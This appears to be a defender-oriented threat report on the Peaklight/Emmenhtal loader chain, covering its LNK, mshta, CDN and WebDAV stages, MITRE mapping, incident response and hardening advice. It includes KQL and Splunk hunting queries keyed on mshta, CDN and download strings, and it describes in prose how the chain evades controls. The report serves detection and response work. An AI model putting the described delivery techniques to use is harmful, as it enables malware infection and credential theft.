Peaklight malware: Stealthy memory-resident delivery chain abusing LNK, mshta, CDN and WebDAV

Peaklight malware deep dive, peaklight, emmenhtal, in-memory malware, lnk, mshta, powershell, bunnycdn, webdav, cryptbot, lumma, shadowladder, hijackloader, threat hunting, incident response, mitre att&ck

1. Executive Summary

Peaklight (also tracked as PEAKLIGHT by Mandiant) is best understood as the PowerShell downloader stage within a broader, multi-stage loader ecosystem that often begins with malicious Windows Shortcut (LNK) files masquerading as media or document content. In Mandiant’s reporting, the infection chain uses mshta.exe as a signed-binary proxy to execute remote script content hosted on a CDN, followed by heavily obfuscated JavaScript and PowerShell that ultimately delivers commodity payloads such as LUMMAC.V2 (Lumma Stealer), CRYPTBOT, and SHADOWLADDER. (Google Cloud)

Multiple independent research teams connect this activity to the Emmenhtal loader family (also referred to as PEAKLIGHT in some contexts), highlighting a crimeware-style ecosystem used by multiple financially motivated actors and, in later campaigns, activity consistent with malware-as-a-service or infrastructure-as-a-service models. (orangecyberdefense.com)

2. Contextual Background

2.1 Nature of the threat

What is “Peaklight”?

• In Mandiant’s public analysis, PEAKLIGHT is the obfuscated PowerShell-based downloader that checks for ZIP archives in hard-coded paths and, if missing, pulls archives from a CDN and writes them to disk before extracting and chaining into additional payload execution. (Google Cloud)
• In parallel reporting, Orange Cyberdefense tracks a closely aligned multi-stage loader it dubbed Emmenhtal, involving HTA, JavaScript, and PowerShell layers, with some variants distributed via ZIP archives containing LNKs and others via WebDAV-hosted LNKs. (orangecyberdefense.com)
• Sekoia.io explicitly states that Emmenhtal is also known as PeakLight, and documents WebDAV-backed distribution infrastructure used to host weaponised LNK files that invoke mshta.exe. (Sekoia.io Blog)

Key takeaway: Peaklight is not a single “fileless stealer” but a delivery chain where early stages can execute in memory and evade disk-based controls, while later stages commonly download archives/payloads and execute commodity malware. (Google Cloud)

2.2 Threat-actor attribution

No reputable public source conclusively attributes Peaklight/Emmenhtal to a single named threat actor. Orange Cyberdefense assesses the loader is highly likely used by multiple financially motivated threat actors (Admiralty/NATO-style confidence: Likely) based on the variety of distribution clusters and payloads observed. (orangecyberdefense.com)

Sekoia.io further supports a shared-service hypothesis, suggesting the supporting WebDAV infrastructure may be offered “as-a-service” to multiple actors due to payload diversity and repeated “test” artefacts. Confidence: Possible (hypothesis explicitly presented as such). (Sekoia.io Blog)

2.3 Sector and geographic targeting

Observed targeting is broad and opportunistic, consistent with crimeware distribution:

• Orange Cyberdefense reports incidents affecting clients in France and describes multiple clusters with inferred targeting signals including Russia, South Africa, Malaysia, and North America, derived from infrastructure geolocation and lure language/filenames. (orangecyberdefense.com)
• Later reporting by Talos links Emmenhtal use to phishing activity appearing to target Ukrainian entities (billing/invoice-themed lures). (Cisco Talos Blog)

3. Technical Analysis

3.1 Attack chain and observed TTPs (with MITRE ATT&CK mapping)

This section synthesises the most repeatable elements described by Mandiant, Orange Cyberdefense, and Sekoia.io.

Stage 0: Initial access and lure delivery

Common entry points include:

• Malicious ZIP archives containing LNK files (often disguised as video content). (orangecyberdefense.com)
• WebDAV-hosted LNK delivery, sometimes preceded by browser redirection that opens an Explorer window pointing at the remote WebDAV share. (orangecyberdefense.com)

MITRE mapping:

• User execution of malicious shortcuts: T1204.002
• Masquerading (lures presented as videos/docs): T1036 (behaviour described across sources)

Stage 1: LNK execution and “living off the land” bootstrap

Mandiant observed LNK parameters that:

• Use forfiles.exe to trigger PowerShell and then invoke mshta.exe to execute remote content from Bunny CDN subdomains. (Google Cloud)
• In another variation, use PowerShell wildcards and registry querying to resolve mshta execution more stealthily before retrieving remote payload content. (Google Cloud)

MITRE mapping:

• Windows command shell (via forfiles): T1059.003
• PowerShell: T1059.001
• Signed binary proxy execution via mshta: T1218.005

Stage 2: Remote script retrieval via CDN and in-memory JavaScript dropper

Mandiant describes a cached/hosted obfuscated JavaScript dropper on CDN infrastructure, using decimal-encoded ASCII and runtime decoding to reveal embedded payload logic. (Google Cloud)

MITRE mapping:

• Obfuscated files or information: T1027
• Ingress tool transfer (download of staged content): T1105
• Use of web protocols: T1071.001

Stage 3: PEAKLIGHT downloader retrieves archives and chains payload execution

Mandiant’s PEAKLIGHT stage:

• Checks for specific ZIP archives in hard-coded locations, downloads them if missing, writes to disk, and extracts. (Google Cloud)
• Delivers and enables execution of payloads including LUMMAC.V2, CRYPTBOT, and SHADOWLADDER. (Google Cloud)
• Includes a “cover” behaviour: after LNK execution, a benign-looking video may play to reduce user suspicion. (Google Cloud)

MITRE mapping:

• Ingress tool transfer: T1105
• Defence evasion via cover content (inferred from described cover video): T1036 (behavioural inference)

Stage 4: Side-loading and follow-on execution patterns

In one Mandiant-described variation:

• A renamed legitimate executable loads a malicious DLL (side-loading), and built-in utilities are used to drop additional components associated with payload execution. (Google Cloud)

MITRE mapping:

• DLL search order hijacking / side-loading: T1574.001 (supported by the described “legitimate EXE loads malicious DLL” pattern)

Payload ecosystem notes

Several sources highlight overlapping naming around SHADOWLADDER and Hijack Loader:

• SCWorld summarises Mandiant’s reporting that PEAKLIGHT enables retrieval of Hijack Loader, also referred to as SHADOWLADDER (and other aliases), alongside Lumma and CryptBot. (SC Media)

3.2 Exploitation status and PoCs

Active use:

• Orange Cyberdefense reported some campaigns were still active as of their analysis cut-off (7 August 2024) and described an ongoing iteration beginning mid-July 2024. (orangecyberdefense.com)
• Subsequent reporting through 2025 indicates continued evolution and reuse of Emmenhtal/PEAKLIGHT components in additional campaigns, including those involving SmokeLoader and MaaS-style distribution. (Cisco Talos Blog)

CVE exploitation

In the core public technical write-ups by Mandiant, Orange Cyberdefense, and Sekoia.io that describe Peaklight/Emmenhtal infection chains, no CVE-dependent exploitation is required to execute the described LNK → mshta → script chain (Google Cloud)

Well-known Office-related RCE vectors:

• CVE-2022-30190 (Follina): Microsoft guidance for CVE-2022-30190 and NVD. (Microsoft)
• CVE-2021-40444 (MSHTML): Microsoft analysis of CVE-2021-40444 exploitation and NVD. (Microsoft)

4. Impact Assessment

4.1 Severity and scope

Peaklight’s practical risk is driven by two factors:

1. Stealth and evasion: early script stages may execute in memory, and the chain heavily relies on trusted Windows binaries (notably mshta) and reputable infrastructure (CDN), complicating simple blocklists and basic static file scanning. (Google Cloud)
2. Downstream payload impact: delivered payloads include information stealers (credential, browser session, and financial data theft) and loaders that can enable further compromise. Mandiant explicitly observed Lumma, CryptBot, and SHADOWLADDER delivered via this chain. (Google Cloud)

Because this is malware and not a single vulnerability, CVSS scoring is not applicable to Peaklight itself. Risk prioritisation should be based on exposure to user-executed lures (downloads, phishing), control strength around PowerShell/mshta, and the business impact of credential theft.

4.2 Victim profile

Public reporting indicates:

• Windows endpoints are the primary target platform. (Google Cloud)
• Victims range from general organisations (opportunistic “fake video” lures) to geographically inferred targeting clusters (including Ukraine-linked phishing activity in 2025 reporting). (orangecyberdefense.com)

5. Indicators of Compromise (IOCs)

5.1 IOC table

Note: Values are shown in an intentionally non-clickable, defanged format (hxxp/hxxps and [.]).

5.2 Detection guidance

Vendor and community detection content

• Mandiant published YARA rules and a structured IOC section within its PEAKLIGHT blog. Use these as a baseline for scanning telemetry and endpoint artefacts: Mandiant PEAKLIGHT detections and IOCs. (Google Cloud)
• SOC Prime references a Sigma rules collection for PEAKLIGHT-related activity (useful as hunting starting points, but validate against your environment’s log sources): SOC Prime PEAKLIGHT detection write-up. (SOC Prime)
• If you run Wazuh/Sysmon pipelines, Wazuh provides an example detection approach and references Mandiant artefacts: Wazuh Peaklight detection blog. (Wazuh)

Practical behavioural hunts (examples)
Use these as templates (adapt fields to your EDR/SIEM):

Windows process creation hunt (high-signal)

• forfiles.exe spawning PowerShell with dot-sourcing and mshta
• PowerShell spawning mshta.exe with remote hxxp(s) URLs
• mshta.exe reaching out to unusual CDN subdomains followed by script-heavy child processes

Example KQL (Microsoft Defender / Sentinel style):

DeviceProcessEvents
| where FileName in~ ("forfiles.exe","powershell.exe","mshta.exe")
| where ProcessCommandLine has_any ("mshta", ".b-cdn", "Expand-Archive", "DownloadData", "SecurityProtocolType")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by Timestamp desc

WebDAV indicator hunt

• Outbound connections to hosts serving /Downloads/ and immediate retrieval of .lnk
• Explorer opening remote file shares that then lead to shortcut execution

Example Splunk (proxy + endpoint correlation concept):

(index=proxy OR index=network) uri_path="*/Downloads/*" (uri_path="*.lnk" OR uri_path="*/Downloads/")
| stats count values(dest) values(url) by src

6. Incident Response Guidance

6.1 Containment, eradication, and recovery

1. Isolate affected endpoints quickly (network containment), because downstream payloads include stealers and loaders with high likelihood of credential theft.
2. Reset credentials and session tokens for users of affected hosts, prioritising browsers, email, VPN, and SaaS accounts. Consider forced re-authentication if you suspect cookie/session theft.
3. Block and sinkhole known indicators from reputable sources (start with Mandiant-published IOCs; augment with internal telemetry). (Google Cloud)
4. Hunt laterally for “follow-on” execution patterns, especially scheduled tasks or abnormal persistence mechanisms introduced by secondary loaders (varies by payload; do not assume a single persistence pattern).

6.2 Forensic artefacts to collect and preserve

Because early stages may be memory-resident or short-lived:

• Memory capture (where policy permits) and EDR process telemetry around powershell.exe, mshta.exe, and suspicious child processes.
• PowerShell logs (Script Block Logging, Module Logging) and AMSI events if enabled.
• Sysmon (Event IDs 1, 3, 7, 11) or equivalent EDR records for process/network/module load.
• Downloads and Temp directories, including extracted ZIPs and any renamed “legitimate” executables used for side-loading. (Google Cloud)
• Proxy/DNS logs for Bunny CDN subdomains and WebDAV endpoints.

6.3 Lessons learned and preventive recommendations

• Treat mshta.exe and script interpreters as high-risk utilities in user workstations, and reduce where operationally possible.
• Tighten controls around “user downloaded executable content” and LNK execution from user-writeable paths.

7. Threat Intelligence Contextualisation

7.1 Similar incidents and ecosystem overlap

Peaklight aligns with a wider trend: multi-stage loaders that blend social engineering, reputable web services, and living-off-the-land binaries to deliver credential theft at scale.

• Orange Cyberdefense documents Emmenhtal as a multistage downloader used across numerous clusters since early 2024. (orangecyberdefense.com)
• Sekoia.io’s “WebDAV-as-a-Service” reporting expands the picture into shared distribution infrastructure used for multiple malware families, reinforcing a service model hypothesis. (Sekoia.io Blog)
• Talos later describes MaaS-style operations using Emmenhtal components and public GitHub repositories for staging payloads, indicating continued professionalisation of the ecosystem. (Cisco Talos Blog)

7.2 Full MITRE ATT&CK mapping table (observed or directly supported behaviours)

8. Mitigation Recommendations

8.1 Hardening and configuration

• Constrain or block mshta.exe where business impact allows (WDAC, AppLocker, or EDR policy). Prioritise user workstations and non-developer endpoints.
• Reduce PowerShell abuse: enable Script Block Logging, enforce Constrained Language Mode where feasible, and monitor for dot-sourcing and encoded commands.
• Mark-of-the-Web enforcement and archive handling: treat downloaded archives containing LNK as high-risk; consider blocking or warning on LNK execution from user writeable directories (Downloads, Temp).
• Web filtering: explicitly monitor and, if appropriate, restrict access to suspicious Bunny CDN subdomains used in campaigns (balance with false positives).

8.2 Patch management advice

Peaklight’s core chain as described does not rely on a specific unpatched vulnerability; it relies on user execution and built-in tooling. Patch prioritisation should instead focus on:

• Rapid patching of commonly exploited Office/Windows RCEs in your environment (for example, where exploitation materially changes your organisation’s exposure). For reference only:
  • Microsoft guidance for CVE-2022-30190 and NVD. (Microsoft)
  • Microsoft analysis for CVE-2021-40444 and NVD. (Microsoft)

9. Historical Context & Related Vulnerabilities

9.1 Previously exploited techniques in the same ecosystem

The Emmenhtal/Peaklight ecosystem reflects persistent attacker preference for:

• Script-heavy, multi-layer loaders (HTA/JS/PowerShell) embedded in or appended to legitimate binaries. (orangecyberdefense.com)
• WebDAV and CDN abuse to host first-stage artefacts and reduce takedown friction. (Sekoia.io Blog)

9.2 Related coverage

• The original summary referenced in your prompt: ThreatIntelReport Peaklight post (25 Sep 2024). (threatintelreport.com)
• Deeper technical reporting that supports and expands the chain:
  • Mandiant PEAKLIGHT: Decoding the stealthy memory-only malware (Google Cloud)
  • Orange Cyberdefense Emmenhtal analysis (orangecyberdefense.com)
  • Sekoia.io WebDAV-as-a-Service infrastructure behind Emmenhtal (Sekoia.io Blog)

10. Future Outlook

Peaklight and the wider Emmenhtal loader family show the characteristics defenders should expect from commodity loader evolution:

• Broader distribution partnerships: Sekoia.io’s infrastructure observations and Talos’s MaaS reporting indicate shared services and modular payload delivery are likely to increase. (Sekoia.io Blog)
• More trusted-host abuse: CDNs, code hosting, and common enterprise web services remain attractive staging points because organisations often cannot block them outright. (Cisco Talos Blog)
• Shift from “fileless” marketing to hybrid reality: memory-resident stages will continue, but many campaigns will still drop archives, DLLs, or side-loading components when that improves reliability and payload success rates. (Google Cloud)

11. Further Reading

Primary technical analyses

• Mandiant: PEAKLIGHT technical analysis, detections, and IOCs (Google Cloud)
• Orange Cyberdefense: Emmenhtal loader distributing commodity infostealers (orangecyberdefense.com)
• Sekoia.io: WebDAV-as-a-Service behind Emmenhtal distribution (Sekoia.io Blog)

Ecosystem evolution

• Cisco Talos: MaaS operation using Emmenhtal and Amadey (GitHub staging) (Cisco Talos Blog)
• G DATA: Emmenhtal chained with SmokeLoader (gdatasoftware.com)

Vulnerability references (contextual)

• Microsoft guidance for CVE-2022-30190 and NVD (Microsoft)
• Microsoft analysis for CVE-2021-40444 and NVD (Microsoft)